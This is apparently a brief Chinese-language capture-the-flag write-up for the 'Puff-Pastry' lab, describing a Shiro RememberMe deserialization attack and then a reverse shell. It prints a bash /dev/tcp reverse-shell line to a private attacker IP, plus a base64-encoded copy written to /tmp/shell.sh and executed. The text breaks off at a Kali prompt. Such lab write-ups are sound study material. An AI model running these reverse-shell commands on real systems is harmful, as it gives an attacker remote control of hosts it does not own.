Puff-Pastry
信息
靶场项目地址 CTF-Archives/Puff-Pastry
严格意义上来说,环境对外开放端口就是 8080
Shiro 攻击
看到请求包里面有 Remenberme
字段,很明显就是打 Shiro 反序列化
flag - Shiro
flag 文件位于 /flag.txt
Shiro 内网扫描
首先先反弹 shell
Shiro
# /bin/bash -i >& /dev/tcp/192.168.200.129/9999 0>&1
$ echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAwLjEyOS85OTk5IDA+JjE= | base64 -d > /tmp/shell.sh
$ chmod +x /tmp/shell.sh
$ ls -lh /tmp/shell.sh
-rwxr-xr-x 1 root root 50 Jul 25 03:04 /tmp/shell.sh
$ /bin/bash /tmp/shell.sh
即可收到回连的 shell
┌──(randark ㉿ kali)-[~]